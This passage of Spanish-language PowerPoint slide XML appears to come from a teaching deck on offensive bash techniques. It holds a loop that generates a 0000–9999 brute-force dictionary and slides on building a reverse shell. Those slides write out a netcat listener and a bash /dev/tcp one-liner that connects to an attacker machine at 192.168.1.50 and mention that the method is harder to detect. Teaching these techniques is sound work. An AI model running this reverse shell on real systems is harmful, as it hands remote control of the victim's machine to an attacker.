              </a:rPr>
              <a:t> tiene una forma de definir un ciclo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> dónde podemos hacer todas las combinaciones de                             0 a 9, en cada posición, aquí un ejemplo con 4 dígitos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> { 0000..9999 };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>done</a:t>
            </a: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De esta forma veremos todas las combinaciones posibles de 0000 a 9999, si guardamos este output en un fichero, lo podemos utilizar como diccionario, cabe aclarar que esto es una versión primitiva y de ejemplo para comprender la lógica de aplicar fuerza bruta, hoy en día las conexiones y credenciales no suelen presentar estos formatos.</a:t>
            </a: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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100959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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Crear una reverse Shell con bash</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Si queremos conectarnos a una máquina víctima, pero de forma que sea la máquina víctima la que establezca la conexión ( Esto es mas difícil de detectar y de cortar la conexión), podemos crear una reverse Shell, creando un servidor con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> en nuestro equipo.</a:t>
            </a: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	</a:t>
            </a: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Primero creamos el servidor en nuestro equipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> : 192.168.1.50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>80</a:t>
            </a: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Luego la máquina víctima deberá ejecutar : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pP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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/bin/bash -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>'exec bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> &amp;&gt; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 192.168.1.50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/80 &lt;&amp;1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3447967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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>everse Shell con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> 2 explicación del comando</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mostrado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>anteriormente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bin/bash -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>'exec bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> &amp;&gt; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 192.168.1.50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/80 &lt;&amp;1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
